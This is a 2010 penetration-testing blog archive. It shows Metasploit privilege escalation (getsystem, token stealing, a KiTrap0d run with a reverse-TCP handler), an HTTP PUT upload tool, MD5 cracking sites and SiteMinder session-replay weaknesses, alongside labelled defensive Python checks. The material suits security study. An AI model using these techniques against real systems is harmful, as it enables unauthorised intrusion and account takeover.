Friday, January 29, 2010

metasploit getsystem command

Shiny new hotness...

meterpreter > getuid
Server username: WINXPSP3\user
**user is an admin; if not admin you can only use -t 4, or -t 0, which will iterate through all options**

meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem -h

Usage: getsystem [options]

Attempt to elevate your privilege to that of local system.

    -h        Help Banner.
    -t <opt>  The technique to use. (Default to '0').
                0 : All techniques available
                1 : Service - Named Pipe Impersonation (In Memory/Admin)
                2 : Service - Named Pipe Impersonation (Dropper/Admin)
                3 : Service - Token Duplication (In Memory/Admin)
                4 : Exploit - KiTrap0D (In Memory/User)

meterpreter > getsystem -t 1
...got system (via technique 1).

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

meterpreter > rev2self

meterpreter > getuid

Server username: WINXPSP3\user

meterpreter > getsystem -t 2
...got system (via technique 2).

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

meterpreter > rev2self

meterpreter > getuid

Server username: WINXPSP3\user

meterpreter > getsystem -t 3
...got system (via technique 3).

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

meterpreter > rev2self

meterpreter > getuid

Server username: WINXPSP3\user

meterpreter > getsystem
...got system (via technique 4).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Hey I want user back!

meterpreter > getsystem -t 4
...got system (via technique 4).

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

meterpreter > rev2self

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM


meterpreter > steal_token -h

[-] Usage: steal_token [pid]

meterpreter > ps

Process list

PID   Name              Arch  User                          Path
---   ----              ----  ----                          ----
0     [System Process]
368   smss.exe          x86   NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
592   csrss.exe         x86   NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\csrss.exe
616   winlogon.exe      x86   NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\winlogon.exe
660   services.exe      x86   NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\services.exe
672   lsass.exe         x86   NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\lsass.exe
832   svchost.exe       x86   NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\svchost.exe
908   svchost.exe       x86   NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\svchost.exe
1000  svchost.exe       x86   NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe
1048  svchost.exe       x86   NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\svchost.exe
1088  svchost.exe       x86   NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\system32\svchost.exe
1440  spoolsv.exe       x86   NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\spoolsv.exe
1560  explorer.exe      x86   WINXPSP3\user                 C:\WINDOWS\Explorer.EXE
540   alg.exe           x86   NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\System32\alg.exe
980   wscntfy.exe       x86   WINXPSP3\user                 C:\WINDOWS\system32\wscntfy.exe
1360  wuauclt.exe       x86   WINXPSP3\user                 C:\WINDOWS\system32\wuauclt.exe
2004  svchost.exe       x86   NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\svchost.exe
2000  ctfmon.exe        x86   WINXPSP3\user                 C:\WINDOWS\system32\ctfmon.exe
960   WINWORD.EXE       x86   WINXPSP3\user                 C:\Program Files\Microsoft Office\Office12\WINWORD.EXE
664   WYvWeNeBQtYr.exe  x86   NT AUTHORITY\SYSTEM           C:\Documents and Settings\user\WYvWeNeBQtYr.exe

meterpreter > steal_token 1560

Stolen token with username: WINXPSP3\user

meterpreter > getuid

Server username: WINXPSP3\user

meterpreter > shell     <-- now uses -t by default
Process 1272 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\user>whoami

C:\Documents and Settings\user>

wait I want a SYSTEM shell again

meterpreter > drop_token
Relinquished token, now running as: WINXPSP3\user
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 856 created.
Channel 3 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\user>whoami

C:\Documents and Settings\user>

or call execute without -t to use your process token

meterpreter > execute -f cmd.exe -i -c -H
Process 676 created.
Channel 5 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\user>whoami

C:\Documents and Settings\user>
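The ps listing above is also evidence a defender can check: the dropper technique leaves a service-account process running from the user's profile directory (PID 664 above). As an added example that is not part of the original post, this parses lines in the meterpreter ps column layout and flags that pattern, plus core Windows binaries running from outside system32; the sample rows are a constructed subset of the listing, with one extra constructed row (PID 1337) to exercise the second rule.

```python
import re

# Constructed sample: a subset of the meterpreter `ps` listing from the post
# (PID Name Arch User Path, whitespace separated; User and Path may contain
# spaces), plus one constructed row (PID 1337) to exercise the second rule.
SAMPLE_PS = r"""
0 [System Process]
368 smss.exe x86 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
592 csrss.exe x86 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
908 svchost.exe x86 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1560 explorer.exe x86 WINXPSP3\user C:\WINDOWS\Explorer.EXE
960 WINWORD.EXE x86 WINXPSP3\user C:\Program Files\Microsoft Office\Office12\WINWORD.EXE
664 WYvWeNeBQtYr.exe x86 NT AUTHORITY\SYSTEM C:\Documents and Settings\user\WYvWeNeBQtYr.exe
1337 svchost.exe x86 WINXPSP3\user C:\Documents and Settings\user\svchost.exe
"""

# The path starts with a drive letter or a backslash, which is what lets the
# lazily matched User field (which may contain spaces) stop in the right place.
PS_LINE = re.compile(
    r"^(?P<pid>\d+)\s+(?P<name>\S+)\s+(?P<arch>x86|x64)\s+"
    r"(?P<user>.+?)\s+(?P<path>(?:[A-Za-z]:\\|\\).*)$"
)

SERVICE_ACCOUNTS = {
    r"NT AUTHORITY\SYSTEM",
    r"NT AUTHORITY\NETWORK SERVICE",
    r"NT AUTHORITY\LOCAL SERVICE",
}
# Locations an unprivileged user can write to: a service-account process whose
# image lives here is what the dropper-based technique leaves behind.
USER_WRITABLE = ("\\documents and settings\\", "\\users\\", "\\temp\\", "\\appdata\\")
# Core Windows binaries that only legitimately run from the system directory.
SYSTEM_ONLY = {"smss.exe", "csrss.exe", "winlogon.exe", "services.exe",
               "lsass.exe", "svchost.exe", "spoolsv.exe"}


def parse_ps(text):
    """Parse ps output into dicts; rows without the full column layout are skipped."""
    rows = []
    for line in text.splitlines():
        m = PS_LINE.match(line.strip())
        if m:
            row = m.groupdict()
            row["pid"] = int(row["pid"])
            rows.append(row)
    return rows


def suspicious_processes(rows):
    """Return (pid, name, reason) for every row that trips one of the two rules."""
    findings = []
    for r in rows:
        path = r["path"].lower()
        if path.startswith("\\??\\"):        # object-manager prefix on some paths
            path = path[4:]
        if r["user"] in SERVICE_ACCOUNTS and any(d in path for d in USER_WRITABLE):
            findings.append((r["pid"], r["name"], "service-account binary in user-writable path"))
        elif r["name"].lower() in SYSTEM_ONLY and "\\system32\\" not in path:
            findings.append((r["pid"], r["name"], "core system binary outside system32"))
    return findings
```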


KiTrap0d now in metasploit

more for documentation and historical purposes than "new hotness"

original advisory
"Microsoft Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack"

Now implemented in Metasploit

msf exploit(handler) > set PAYLOAD windows/meterpreter/
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit

[*] Starting the payload handler...
[*] Started reverse handler on port 443
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened ( ->

meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > sysinfo
Computer: WINXPSP3
OS : Windows XP (Build 2600, Service Pack 3).
Arch : x86
Language: en_US
meterpreter > run ki
run killav run kitrap0d
meterpreter > run kitrap0d
[*] Currently running as WINXPSP3\user

[*] Loading the vdmallowed executable and DLL from the local system...
[*] Uploading vdmallowed to C:\DOCUME~1\user\LOCALS~1\Temp\pOOiEDDBFzJ.exe...
[*] Uploading vdmallowed to C:\DOCUME~1\user\LOCALS~1\Temp\vdmexploit.dll...
[*] Escalating our process (PID:1128)...

Windows NT/2K/XP/2K3/VISTA/2K8/7 NtVdmControl()->KiTrap0d local ring0 exploit
-----------------------------------------------------------------------------

[?] GetVersionEx() => 5.1
[?] NtQuerySystemInformation() => \WINDOWS\system32\ntkrnlpa.exe@804D7000
[?] Searching for kernel 5.1 signature: version 2...
[+] Trying signature with index 3
[+] Signature found 0x29142 bytes from kernel base
[+] Starting the NTVDM subsystem by launching MS-DOS executable
[?] CreateProcess("C:\WINDOWS\twunk_16.exe") => 1316
[?] OpenProcess(1316) => 0x7e8
[?] Injecting the exploit thread into NTVDM subsystem @0x7e8
[?] WriteProcessMemory(0x7e8, 0x2070000, "VDMEXPLOIT.DLL", 14);
[?] WaitForSingleObject(0x7cc, INFINITE);
[?] GetExitCodeThread(0x7cc, 0012FF44); => 0x77303074
[+] The exploit thread reports exploitation was successful
[+] w00t! You can now use the shell opened earlier

[*] Deleting files...
[*] Now running as NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

**Nipple Rub...**

Friday, January 22, 2010

Ruby, Nmap XML, and Databases

So I had a requirement to take some output from nmap scans, shove it into a database and then be able to run some queries on that data.

Wait, isn't there something that already does that?!

Actually PBNJ and will do this but uses (eeeek!) perl to do it. I wanted to do it in Ruby.

Your options for Ruby & Nmap parsing are:

-metasploit has its own nmap xml parser
-writing your own

I started with rubynmap for my parsing gem.
(Note: use the svn version. The version number hasn't changed, but the svn version works a lot better.)

I stole the schema from nmap_xml2sql and added a few things and a scripts table for nmap scripts output and tried shoving that into a sqlite3 database.
TABLE nmap (
version TEXT,
xmlversion TEXT,
args TEXT,
types TEXT,
starttime INTEGER,
startstr TEXT,
endtime INTEGER,
endstr TEXT,
numservices INTEGER)

TABLE hosts (
ip4 TEXT,
ip4num INTEGER,
hostname TEXT,
status TEXT,
tcpcount INTEGER,
udpcount INTEGER,
mac TEXT,
vendor TEXT,
ip6 TEXT,
distance INTEGER,
uptime TEXT,
upstr TEXT)
This "works", but sqlite3 doesn't seem to actually support foreign keys. So while I was correctly assigning a SID value in nmap, that value wasn't linking up in hosts, and likewise the HID value in subsequent tables. If I'm wrong here please let me know if this works for you as written. For me it populates with nulls and I don't see how it's linking back to the tables.
cg@ihatesql:~$ sqlite3 nmap
SQLite version 3.6.21
sqlite> .dump nmap
nmapversion TEXT,
xmlversion TEXT,
args TEXT,
types TEXT,
starttime INTEGER,
startstr TEXT,
endtime INTEGER,
endstr TEXT,
numservices INTEGER);
INSERT INTO "nmap" VALUES(1,'4.90RC1','1.03','nmap -A -oX test.xml','connect',1262181807,'Wed Dec 30 09:03:27 2009',1262181814,'Wed Dec 30 09:03:34 2009',1000);

sqlite> .dump hosts
ip4num INTEGER,
hostname TEXT,
status TEXT,
mac TEXT,
vendor TEXT,
ip6 TEXT,
distance INTEGER,
uptime TEXT,
starttime INTEGER,
endtime INTEGER,
INSERT INTO "hosts" VALUES(NULL,1,'','','up','','','','','',1262181807,1262181814);
So we can see that the SID and HID are correctly auto-incrementing, but the SID didn't make it into the hosts table.

**Actually sqlite3 as of 3.6.19 supports foreign keys, by adding a FOREIGN KEY(sid) REFERENCES nmap(sid) to the hosts table and so on, and by declaring PRAGMA foreign_keys = ON.**

BUT I still couldn't get it to work.

Doing a db.execute("PRAGMA foreign_keys = ON") wasn't working for me. I received no errors, but doing a dump on the table would list the foreign key support as OFF :-( Maybe it's a gem issue?

So to cheat I added ip4num, ip6 and hostname to tables I knew I'd be querying a lot, like ports and scripts.

ip4num INTEGER,
ip6 TEXT,
state TEXT,
reason TEXT,
name TEXT,
tunnel TEXT,
product TEXT,
version TEXT,
extra TEXT,
confidence INTEGER,
method TEXT,
proto TEXT,
owner TEXT,
rpcnum TEXT,
fingerprint TEXT,

That way, querying for open ports or specific versions of a service was possible and I could still get an IP associated with that. It's a bit harder to pull all that information together, but it's still there, and a select * from ports; or select ip4num from ports where port = 1521; would return quick results.
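As an added example (not the post's code, and in Python rather than Ruby because its sqlite3 module is built in), this shows the foreign key the post describes actually being enforced: the pragma is issued per connection and read back rather than assumed, a host row whose sid matches no scan is rejected, and the join from an IP back to its scan works without copying ip4num into the other tables. Table and column names follow the post's schema; the IP addresses are constructed.

```python
import sqlite3

# Schema modelled on the post's nmap and hosts tables, trimmed to the columns
# that matter here, with the FOREIGN KEY the post describes adding to hosts.
SCHEMA = """
CREATE TABLE nmap (
    sid         INTEGER PRIMARY KEY AUTOINCREMENT,
    nmapversion TEXT,
    args        TEXT,
    starttime   INTEGER,
    endtime     INTEGER);
CREATE TABLE hosts (
    hid      INTEGER PRIMARY KEY AUTOINCREMENT,
    sid      INTEGER NOT NULL,
    ip4      TEXT,
    ip4num   INTEGER,
    hostname TEXT,
    status   TEXT,
    FOREIGN KEY(sid) REFERENCES nmap(sid));
"""


def open_db(path=":memory:"):
    """Open a connection with foreign keys enforced. The pragma applies only to this
    connection and is ignored inside an open transaction, so issue it before any INSERT."""
    db = sqlite3.connect(path)
    db.execute("PRAGMA foreign_keys = ON")
    db.executescript(SCHEMA)
    return db


def foreign_keys_enabled(db):
    """Read the setting back rather than assume it took (the post saw it reported OFF)."""
    return db.execute("PRAGMA foreign_keys").fetchone()[0] == 1


def ip4_to_num(ip4):
    """Dotted quad to integer, for the ip4num column the post uses in queries."""
    a, b, c, d = (int(octet) for octet in ip4.split("."))
    return (a << 24) | (b << 16) | (c << 8) | d


def insert_scan(db, nmapversion, args, starttime, endtime):
    """Insert one scan row and return its SID for the host rows to reference."""
    cur = db.execute(
        "INSERT INTO nmap(nmapversion, args, starttime, endtime) VALUES (?, ?, ?, ?)",
        (nmapversion, args, starttime, endtime))
    return cur.lastrowid


def insert_host(db, sid, ip4, hostname, status):
    cur = db.execute(
        "INSERT INTO hosts(sid, ip4, ip4num, hostname, status) VALUES (?, ?, ?, ?, ?)",
        (sid, ip4, ip4_to_num(ip4), hostname, status))
    return cur.lastrowid


def orphan_host_rejected(db, bogus_sid):
    """True if SQLite refuses a host row whose sid matches no scan."""
    try:
        insert_host(db, bogus_sid, "192.0.2.99", "", "up")   # constructed IP
        return False
    except sqlite3.IntegrityError:
        return True


def scan_args_for_host(db, ip4):
    """From an IP back to the scan that found it, via the sid link."""
    row = db.execute(
        "SELECT n.args FROM hosts h JOIN nmap n ON n.sid = h.sid WHERE h.ip4 = ?",
        (ip4,)).fetchone()
    return row[0] if row else None
```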

So code or it didn't happen...

nmap-parse takes an nmap xml file and spits out some of the results

rubynmapsqlite3 takes an nmapfile and database name (optional), creates or connects to the database, populates the tables if it needs to, parses the nmap xml and puts it into its appropriate tables.

ruby-nmap-parse uses the ruby-nmap gem to parse nmap xml files

-my ruby coding sucks.
-my SQL coding sucks worse.
-code is released in "works for me" status
-send diffs not complaints :-) unless you go crazy with it, in which case just send me a link to your code

Next up pushing that data into a postgres database instead of sqlite3.

Monday, January 18, 2010

DirChex_v1.3 re-posted / PUT problem fixed.

Quick Note:

There were some issues with DirChex on some machines (after compilation) relating to handling response code errors / performing the PUT option. This has been fixed by changing compilation options.

Feel free to Download again. Apologies for the inconvenience.

Happy Hacking!


Monday, January 11, 2010

Various Online Password Crackers

Just a list of online (mostly) md5 crackers, though some will do other hash types too.

This post over on pcsec got me thinking about them.

Of course not all of those are working, at least not for me.

So here is that list with links and a few others thanks to my twitter homies

Bonus points for two of the sites from the screen shot just giving you a parallels plesk login.

Sites specifically mentioned to me, in no particular order:
c0llision: (also has IRC support)

Lastly, for fun, a metasploit module that submits the hash to and displays the password if it's found.

msf auxiliary(md5check_md5crack) > run

[*] Sending 098f6bcd4621d373cade4e832627b4f6 hash to
[*] plaintext md5 is: test
[*] Auxiliary module execution completed

link: (rename to .rb)

I started to do more than just md5crack, but writing regexes for different sites just seemed like a waste of time.

Sunday, January 10, 2010

SiteMinder Single Sign-On / Security Risks


Recently I was having a discussion with some folks about Web Security and amongst some of the items discussed was Single Sign-On. It reminded me of SiteMinder and some things that bothered me about how some organizations utilize the solution. Especially the blind reliance upon the vendor to have written a secure solution rather than verifying if this technology is being employed correctly.

Sometimes it's not the software that was created, it is the folks that configure it that cause the headache. Sometimes the biggest flaw is inherent because of the very nature for which the software was intended to be used in the first place. When you configure this incorrectly AND you do it at the Single Sign-On server level it can literally be an "epic fail". In a large organization it can potentially leave hundreds or even thousands of sites open for compromise.

So I first noticed the odd configuration, and therefore the potentially insecure nature of SiteMinder, approximately 1 year or so ago (can't remember, could have been longer). I thought I would share some of the details with you, the reader, to give a better idea of where some of the pitfalls might exist, and maybe this helps someone who is charged with installing/configuring the SiteMinder solution in the future. I really don't believe this could ONLY be a SiteMinder specific issue. My personal belief is this can hold true for any Single Sign-On solution if improperly managed.

Now keep in mind I am not a full-time researcher. That being said, this is simply what I've observed. Also, I encourage anyone reading this to invest some time playing around with the technology. Don't just take my word for it. I will not detail the EXACT steps for correct configuration, but rather take a broader view of where I've seen things go wrong and some proactive steps to take.

First, let's talk about the benefits of SiteMinder SSO:

1) Can be used as a means of verifying and/or restricting the user before ever viewing the application. As an attacker I may not need to be logged in to cause damage. So having anonymous access to the unprotected portion of your site could still be used as a launch platform for another attack such as XSS, SQLi, abuse of account registration, password recovery, default content discovery.... etc, etc.

2) Can be configured to require two factor authentication.

3) Has the ability to provide either two-factor authentication (Common Access Cards) OR if your users do not have access to CAC equipment this allows for form based authentication as well. So it is convenient.

4) A bit more difficult to brute force login credentials AND can enforce account lock-out while mitigating other security concerns like registration, etc. However, this is a very general statement and in many cases isn't implemented correctly.

5) Simple account management. This doesn't require a user to remember, or jot down on a sticky pad ;-), their user-name and password to a large number of applications.

Let's detail some of the drawbacks:

1) The solution is not infallible but in the cases I've come across is treated as such.

2) If one site fails at any number of things other sites can become targets of attack and possibly victims of a compromise.

3) The user privacy issue. ESPECIALLY when employing CAC / PKI authentication. The data held on a user's Common Access Card can be logged on the web application they are using and in some cases most certainly is (for troubleshooting purposes?).

The data within their CAC can hold valuable information about the individual that they certainly wouldn't allow just anyone to view, so why would a web app developer need this information for the purposes of troubleshooting the SiteMinder solution? This basically boils down to trust I suppose, and I'm sure it can be argued at length.

Details of the SiteMinder authentication (what I've observed):

1)    A user requests target URL

2)    User is then redirected to

3)    The user submits a request with

4)    The ssoserver site is checking to see if we already have a valid session.

5)    The normal response is an HTTP 302 redirection to with the parameter SMSESSION=NO. This basically tells the application that this user does not have a valid SiteMinder session and must authenticate.

6)    At this point provides an HTTP 401 (authorization required) message and sets the browser's cookie as SMCHALLENGE=YES.
Now keep in mind, these are two different sites, so the SSL stream is broken by default, and because of this it will work even if one application does not employ SSL. This is important when dealing with sites that have "Forceful Browsing" vulnerabilities or are simply not using SSL.

7)    So now the user's browser sends a request to with basic authorization and a cookie - SMCHALLENGE=YES.

8)    The response from is a redirection (HTTP 302) to with the session value in the query. For example,
NOTE: This is bad. This value is sent in the header of the request and is now stored in three separate locations: 1) proxy logs, 2) server side logs, 3) the user's browser. Additionally, this value is your "Master Key" AND in many cases is not set to expire for some time, for user-friendliness purposes.

9)    Simultaneously with Step 8, is now performing a
set-cookie= SMSESSION-ABC123 ; path=/; secure
and this is within the 302 redirection response. So take note that the secure flag is set and the path is for the BUT there is no HttpOnly flag. This means that client side JavaScript can interact with the cookie.

10)    So as stated previously in step 8 we are sending a GET request to
NOTE: The target value has special characters URL encoded.

11)    The response from is a redirection (HTTP 302) to with a set-cookie= SMSESSION-ABC123; path=/;; secure

12)    The user's browser sends a request to
The referrer is set as and now two SMSESSION cookie values are provided/set. In this initial request both SMSESSION values (cookie) are set as SMSESSION-ABC123 and passed to the application in the subsequent request.

13)    Now the user is redirected via an HTTP 302 to and the new SMSESSION value set following the first request is XYZ123. Remember the user will always pass two SMSESSION values. One of those values is the "Master Key" SMSESSION-ABC123 and the other is SMSESSION-XYZ. For all subsequent requests to resources on the SMSESSION value will be checked. If you have this value then you are allowed into the site, with the caveat being that your ssoserver account must have permissions to view this application.

Security Concerns:

1) XSS will allow anything to be taken, which of course includes the “Master Key” SMSESSION value which is stored as a cookie value. CAVEAT: XSS must be performed on a site; otherwise the domain mismatch will not allow the cookie value to be stolen. An attacker can replay this cookie/query value to gain access to a list of * sites (details - Number 6)

2) The SMSESSION value is stored in the browser cache due to the fact that a GET request was sent with the value in the header.

3) Usually this value does not expire for quite some time.

4) If the application does not enforce SSL this value will be shown in clear-text across the wire.

5) Due to the fact the HttpOnly flag is NOT set, Javascript can interact with the cookies.

6) Any application the user has access to can become a potential target. The applications which employ the SiteMinder agent will check to see if the user already has a valid SiteMinder session. If the Master Key (SMSESSION-ABC123) is employed, the will recognize this as a valid SMSESSION when the attacker’s browser is redirected to the ssoserver for an active session validation. Once the ssoserver determines the cookie value provided by the attacker is a valid session value the attacker is given the necessary SMSESSION cookie for accessing the target web application.

7) The SMSESSION value, in all of the instances I've observed, is not salted by IP nor limited by session. This means that a user in Egypt can simultaneously access an application using the same SMSESSION value that a user in Canada is currently using.
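Two checks for the concerns above, as an added example that is not from the original post: an audit of the ssoserver 302 responses for a session token in the Location query string and for an SMSESSION cookie missing HttpOnly or Secure (concerns 1, 2 and 5), and a pass over web server log lines that reports SMSESSION values used from more than one client IP (concern 7). Hostnames, token values and the log format are constructed placeholders.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

SESSION_COOKIE = "SMSESSION"


def parse_set_cookie(value):
    """Split a Set-Cookie value into (name, value, attrs); attribute names lowercased."""
    parts = [p.strip() for p in value.split(";")]
    name, _, cval = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        k, _, v = part.partition("=")
        attrs[k.strip().lower()] = v.strip()
    return name.strip(), cval.strip(), attrs


def audit_redirect(status, headers):
    """Return the problems found in one response, given its (name, value) headers."""
    findings = []
    for name, value in headers:
        lname = name.lower()
        if lname == "location" and status in (301, 302, 303, 307, 308):
            # Step 8 of the flow: the token rides in the query string, so it is
            # written to proxy logs, server logs and browser history.
            if SESSION_COOKIE in parse_qs(urlsplit(value).query):
                findings.append("session token in redirect query string")
        elif lname == "set-cookie":
            cname, _, attrs = parse_set_cookie(value)
            if cname == SESSION_COOKIE:
                if "httponly" not in attrs:      # step 9: script can read the cookie
                    findings.append("SMSESSION cookie lacks HttpOnly")
                if "secure" not in attrs:
                    findings.append("SMSESSION cookie lacks Secure")
    return findings


# Constructed: the step 8/9 response as the post describes it, then a hardened
# form with no token in the URL and HttpOnly added (hostnames are placeholders).
OBSERVED_HEADERS = [
    ("Location", "https://app.example.test/?SMSESSION=ABC123&target=%2Freports"),
    ("Set-Cookie", "SMSESSION=ABC123; path=/; secure"),
]
HARDENED_HEADERS = [
    ("Location", "https://app.example.test/reports"),
    ("Set-Cookie", "SMSESSION=ABC123; path=/; secure; HttpOnly"),
]

# Constructed log format: client_ip timestamp method path SMSESSION=<value>
LOG_LINE = re.compile(r"^(?P<ip>\S+) \S+ \S+ \S+ SMSESSION=(?P<token>\S+)$")
SAMPLE_LOG = """\
203.0.113.5 2010-01-10T10:00:00Z GET /reports SMSESSION=ABC123
203.0.113.5 2010-01-10T10:00:04Z GET /reports/1 SMSESSION=ABC123
198.51.100.7 2010-01-10T10:02:13Z GET /reports SMSESSION=ABC123
198.51.100.9 2010-01-10T10:03:41Z GET /reports SMSESSION=XYZ123
"""


def shared_sessions(log_text):
    """Concern 7: SMSESSION values seen from more than one client IP, with the IPs."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if m:
            seen[m["token"]].add(m["ip"])
    return {tok: sorted(ips) for tok, ips in seen.items() if len(ips) > 1}
```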

Wednesday, January 6, 2010

DirChex_v1.3 Released / GUI Remains responsive

As an update I've just uploaded DirChex_v1.3, which will NOT freeze up while sending the requests you specify. Also, because the GET requests / PUT requests / GUI all have separate threads, you can basically do more at once without worrying about it. It's just a nice enhancement.

Download 1.3 Here

Happy Hacking!

Sunday, January 3, 2010

DirChex_v1.2 Released (New Functionality)

The new version of DirChex is ready and available for download Download Here.

So @k3r0s1n3 is on the hook for creating the visual layout of a BT4 specific version ;-) BUT we do have the exe version and source available for v1.2. In the meantime, the BT4 specific version of 1.1 will remain up on the downloads page. Also, I'd love to hear from someone with a mac/OSX and see how it goes running DirChex on this platform.

Moving along..... DirChex now has two tabs. A 'GET' and a 'PUT' tab.

We've already pointed at how the GET tab works in previous posts. For the 'PUT' tab things get a bit different. For one, the HTTP method is obviously PUT vice GET. Secondly, you have more options. Thirdly, the file you upload must have the list of URLs in the proper format, otherwise the reason for using it is negated.

A file containing correctly formatted URLs

Now for the options

The first options are obvious and the same as the GET tab. You need to choose an input file like the one above. Then select either the default proxy ip/port options or enter your own. The next couple of options require a bit of explanation.

OPTION: Name of the file to PUT

If I want to create a test.txt file on the remote application I would enter test.txt in this field.

OPTION: Text within the field

This is where you would enter the text you would like to place in the test.txt file. I've entered "This is my example text"

OPTION: Choose content-type / MIME Property

Here you would want to select the various available content-types (MIME Media). If you are unsure just choose the first available choice 'application/x-www-form-urlencoded'.

OPTION: Choose your user-agent

This one is self explanatory.

When all options are correctly filled in it should look like this:

This is what the request would look like in raw form (using Burp Suite)

If you have any questions/comments let us know, suggestions are welcome!

Lastly, we are aware that the program freezes up until all requests are completed. Apologies, we are working on this. For now, some functionality was added and I hope you find it useful.

Happy Hacking!

~cktricky & k3r0s1n3